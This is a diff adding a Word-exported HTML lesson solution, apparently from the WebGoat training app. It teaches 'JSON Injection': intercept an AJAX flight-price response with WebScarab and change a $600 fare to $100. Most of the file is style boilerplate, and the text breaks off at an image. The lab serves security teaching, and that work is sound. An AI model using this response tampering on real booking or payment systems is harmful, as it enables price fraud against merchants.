+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform JSON Injection <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
+teaches how to perform JSON Injection Attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>How the
+attacks works:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>JavaScript Object
+Notation (JSON) is a simple and effective lightweight data exchange format.
+JSON can be in a lot of forms such as arrays, lists, hashtables and other data
+structures. JSON is widely used in AJAX and Web2.0 application and is favored
+by programmers over XML because of its ease of use and speed. However, JSON,
+like XML is prone to Injection attacks. A malicious attacker can inject the
+reply from the server and inject some arbitrary values in there. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->You
+are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code
+SEA.<br>
+Once you enter the three digit code of the airport, an AJAX request will be
+executed asking for the ticket price.<br>
+You will notice that there are two flights available, an expensive one with no
+stops and another cheaper one with 2 stops.<br>
+Your goal is to try to get the one with no stops but for a cheaper price.</span><span
+style='font-family:"Arial","sans-serif";mso-fareast-language:JA'><o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
+ o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
+ stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_77" o:spid="_x0000_i1030" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/JSONInjection_files/image013.jpg" v:shapes="Picture_x0020_77"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> AJAX Security - JSON Injection</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'>Like with the previous lessons you need to manipulate the HTTP Response
+using WebScarab.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'>Examine the normal flow by entering the airport code BOS and SEA and
+intercept the HTTP Request and the HTTP Response in WebScarab.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_78"
+ o:spid="_x0000_i1029" type="#_x0000_t75" style='width:481.5pt;height:345pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/JSONInjection_files/image014.jpg" v:shapes="Picture_x0020_78"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Intercept HTTP Request</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_79" o:spid="_x0000_i1028"
+ type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/JSONInjection_files/image015.jpg" v:shapes="Picture_x0020_79"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Intercept HTTP Response</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change the
+price for the expensive flight of $600 to $100 and click “Accept changes”.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_80" o:spid="_x0000_i1027"
